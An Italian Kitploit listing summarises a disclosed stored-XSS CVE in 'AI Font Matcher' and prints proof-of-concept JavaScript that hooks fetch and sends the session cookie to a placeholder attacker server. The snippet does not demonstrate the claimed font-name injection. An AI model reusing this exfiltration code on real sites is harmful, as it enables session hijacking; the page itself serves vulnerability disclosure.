Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-63708 — Proof-of-concept exploit per CVE-2025-63708, una vulnerabilità XSS memorizzata in AI Font Matcher. Dimostra il furto di cookie di sessione tramite nomi di font family non sanificati nelle risposte di fetch dei webfonts. | Kitploit
Strumenti/GitHubGitHub/dylandavis1/cve-2025-63708
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubdylandavis1/cve-2025-63708

CVE-2025-63708

Proof-of-concept exploit per CVE-2025-63708, una vulnerabilità XSS memorizzata in AI Font Matcher. Dimostra il furto di cookie di sessione tramite nomi di font family non sanificati nelle risposte di fetch dei webfonts.

Vedi Repository
8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-63708

ID CVE: CVE-2025-63708
Assegnato: 11-12-2025 Tipo di problema: CWE-79 (Cross-Site Scripting)
Prodotto affetto: "AI Font Matcher" (pubblicato il 10-10-2025, nid=18425)
Pagina del prodotto: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
Data di scoperta: 11-10-2025
Ricercatore: Dylan Davis

Riepilogo

L'applicazione elabora i dati provenienti da un fetch di webfonts senza sanificare i nomi delle famiglie di font. Un attaccante che controlla o intercetta quella risposta può iniettare JavaScript che viene eseguito nel contesto della pagina, consentendo il furto di cookie di sessione e l'acquisizione dell'account.

Impatto

  • Esecuzione arbitraria di JavaScript nel browser della vittima
  • Esfiltrazione dei cookie di sessione (durante i test ho osservato cookie non HttpOnly)
  • Dirottamento dell'account e azioni eseguite per conto dell'utente

Versioni / Ambito interessati

  • Il pacchetto "AI Font Matcher" distribuito su SourceCodester a partire dal 10-10-2025.

Riproduzione (PoC)

Questo PoC dimostra l'esecuzione di codice agganciando window.fetch e restituendo un payload controllato di Web Fonts.

  1. Esegui l'app localmente dal codice scaricato.
  2. Apri DevTools → Console e incolla il PoC qui sotto (oppure carica poc.js).
  3. Attiva l'interfaccia che recupera webfonts; osserva un alert(1).
root@kitploit:~
window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
    const url = (typeof input === 'string') ? input : input?.url;
    if (url && url.includes('webfonts')) {
        // Esfiltra il cookie verso il tuo server
        fetch('http://[your-ip]:8001/steal?cookie=' + 
              encodeURIComponent(document.cookie))
            .catch(e => console.log('Esfiltrazione fallita:', e));
        
        return new Response(JSON.stringify({
            kind: "webfonts#webfontList",
            items: [{ family: "Playfair Display", category: "serif" }]
        }), {
            status: 200, 
            headers: {'Content-Type': 'application/json'}
        });
    }
    return window.__origFetch.apply(this, arguments);
};
Scarica lo strumento